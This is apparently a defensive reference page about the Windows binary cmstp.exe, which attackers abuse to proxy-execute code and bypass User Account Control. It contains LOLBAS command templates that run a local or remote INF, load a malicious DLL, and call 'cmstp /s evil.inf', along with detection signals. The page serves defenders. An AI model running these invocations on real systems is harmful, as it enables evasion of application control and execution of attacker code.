Process

unknown

cmstp.exe

cmstp.exe is the Connection Manager Profile Installer, meant to install network connection profiles from an INF file. It is rarely used today. Attackers abuse it to run commands through a signed Microsoft binary and to bypass User Account Control, driven entirely by a crafted INF.

CategoryUtilityTagsmicrosoftcore-windowslolbin

File identity

File details

Not observed.

Signing information

Not observed.

File version0

Not observed.

File size0

Not observed.

Execution context

File paths0

Not observed.

User context0

Not observed.

Integrity level0

Not observed.

Instances0

Not observed.

Session0

Not observed.

Token privileges0

Not observed.

Ancestry

Parents0

Not observed.

Children0

Not observed.

Grandparents0

Not observed.

Grandchildren0

Not observed.

Behavior

Loaded modules0

Not observed.

Named pipes0

Not observed.

Process handles0

Not observed.

Command-line patterns0

Not observed.

LOLBAS3
  • cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}Execute · Execute code hidden within an inf file. Download and run scriptlets from internet.
  • cmstp.exe /ni /s {REMOTEURL:.inf}AWL Bypass · Execute code hidden within an inf file. Execute code directly from Internet.
  • cmstp.exe /nfExecute · Proxy execution of a malicious DLL via registry modification.

View LOLBAS entry

Indicators

Hashes

Not observed.

Analysis

About this process

cmstp.exe installs or removes Connection Manager service profiles described in an INF file. An INF can specify scriptable actions that run during installation, and that is the mechanism attackers repurpose: a crafted INF tells cmstp to fetch and run a command or scriptlet. The genuine binary lives at C:\Windows\System32\cmstp.exe, with a 32-bit copy under SysWOW64.

Legitimately, cmstp is used to deploy VPN or dial-up connection profiles, which is uncommon on modern systems. The INF it is given, and where that INF came from, are what give an instance meaning.

Security notes

cmstp.exe is a system-binary proxy (T1218.003). A crafted INF makes the signed binary execute an embedded or remote command or scriptlet, so an attacker runs cmstp /s evil.inf to have a trusted Microsoft process run their code, bypassing application-control rules. The same INF mechanism is used to bypass User Account Control, because cmstp can run an action auto-elevated without the usual prompt.

Connection-profile installation is rare, so cmstp running at all is notable, and an INF from a temp, download, or remote path, or a parent like an Office application, marks it as abuse rather than network configuration.

Anomaly signals4
  • An INF on the command line from a user-writable path or a remote locationhigh
  • Parent is an Office application, a script host, cmd.exe, or powershell.exehigh
  • cmstp spawning a shell or making outbound network connectionshigh
  • Run on a host that does not deploy connection profilesmed

Telemetry

OS prevalence0

Not observed.

Observation timeline

Not observed.

References

Subsearch

Hasbeen seen inof cmstp.exe?
Edit this page on GitHub